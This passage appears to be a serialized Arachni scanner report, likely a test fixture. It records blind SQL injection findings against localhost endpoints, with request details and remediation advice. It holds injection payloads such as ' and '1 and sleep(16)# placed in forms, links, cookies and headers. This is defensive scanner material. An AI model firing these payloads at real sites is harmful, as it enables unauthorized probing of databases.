aW5wdXQ=
:opts:
:injected_orig: !binary |-
JyBhbmQgJzE=
:combo:
!binary "aW5wdXQ=": default' and '1
:injected: !binary |-
JyBhbmQgJzE=
:id: !binary |-
JyBhbmQgJzE=
:elem: form
:regexp: ''
var: input
url: http://localhost:11824/form/append?input=default'+and+'1
injected: ! ''' and ''1'
id: ! ''' and ''1'
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ! '1 item found: Blah blah blah...'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations: []
internal_modname: BlindrDiffSQLInjection
internal_modname: BlindrDiffSQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:11824/link/append?input=default)))+and+1
elem: link
method: GET
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:var: !binary |-
aW5wdXQ=
:opts:
:injected_orig: !binary |-
KSkpIGFuZCAx
:combo:
!binary "aW5wdXQ=": default))) and 1
:injected: !binary |-
KSkpIGFuZCAx
:id: !binary |-
KSkpIGFuZCAx
:elem: link
:regexp: ''
var: input
url: http://localhost:11824/link/append?input=default)))+and+1
injected: ))) and 1
id: ))) and 1
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ! '1 item found: Blah blah blah...'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations: []
internal_modname: BlindrDiffSQLInjection
internal_modname: BlindrDiffSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie
url: http://localhost:11824/cookie/append
elem: cookie
method: GET
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:var: !binary |-
Y29va2ll
:opts:
:injected_orig: !binary |-
IiBhbmQgIjE=
:combo:
!binary "Y29va2ll": default" and "1
:injected: !binary |-
IiBhbmQgIjE=
:id: !binary |-
IiBhbmQgIjE=
:elem: cookie
:regexp: ''
var: cookie
url: http://localhost:11824/cookie/append
injected: ! '" and "1'
id: ! '" and "1'
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ! '1 item found: Blah blah blah...'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default"+and+"1
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations: []
internal_modname: BlindrDiffSQLInjection
internal_modname: BlindrDiffSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mysql/form/straight
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": sleep(16)#
:follow_location: true
:injected: sleep(16)#
:combo:
!binary "aW5wdXQ=": sleep(16)#
:action: http://localhost:12482/mysql/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mysql/form/straight
injected: sleep(16)#
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mysql/form/append
elem: form
method: POST
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": defaultsleep(16)#
:follow_location: true
:injected: defaultsleep(16)#
:combo:
!binary "aW5wdXQ=": defaultsleep(16)#
:action: http://localhost:12482/mysql/form/append
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mysql/form/append
injected: defaultsleep(16)#
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mysql/link/straight?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": sleep(16)#
:follow_location: true
:injected: sleep(16)#
:combo:
!binary "aW5wdXQ=": sleep(16)#
:action: http://localhost:12482/mysql/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mysql/link/straight?input=default
injected: sleep(16)#
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mysql/link/append?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": defaultsleep(16)#
:follow_location: true
:injected: defaultsleep(16)#
:combo:
!binary "aW5wdXQ=": defaultsleep(16)#
:action: http://localhost:12482/mysql/link/append?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mysql/link/append?input=default
injected: defaultsleep(16)#
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie
url: http://localhost:12482/mysql/cookie/straight
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": sleep(16)#
:injected: sleep(16)#
:combo:
!binary "Y29va2ll": sleep(16)#
:action: http://localhost:12482/mysql/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:12482/mysql/cookie/straight
injected: sleep(16)#
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=sleep(16)#;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie2
url: http://localhost:12482/mysql/cookie/append
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie valuesleep(16)#
:injected: cookie valuesleep(16)#
:combo:
!binary "Y29va2llMg==": cookie valuesleep(16)#
:action: http://localhost:12482/mysql/cookie/append
:silent: true
:regexp: ''
var: cookie2
url: http://localhost:12482/mysql/cookie/append
injected: cookie valuesleep(16)#
id:
regexp: ''
regexp_match:
elem: cookie
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+valuesleep(16)#
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/mysql/header/straight
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: sleep(16)#
:injected: sleep(16)#
:combo:
User-Agent: sleep(16)#
:action: http://localhost:12482/mysql/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/mysql/header/straight
injected: sleep(16)#
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sleep(16)#
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/mysql/header/append
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
c2xlZXAoX19USU1FX18pIw==
:skip_orig: true
:injected_orig: !binary |-
c2xlZXAoMTYpIw==
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_usersleep(16)#
:injected: arachni_usersleep(16)#
:combo:
User-Agent: arachni_usersleep(16)#
:action: http://localhost:12482/mysql/header/append
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/mysql/header/append
injected: arachni_usersleep(16)#
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_usersleep(16)#
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
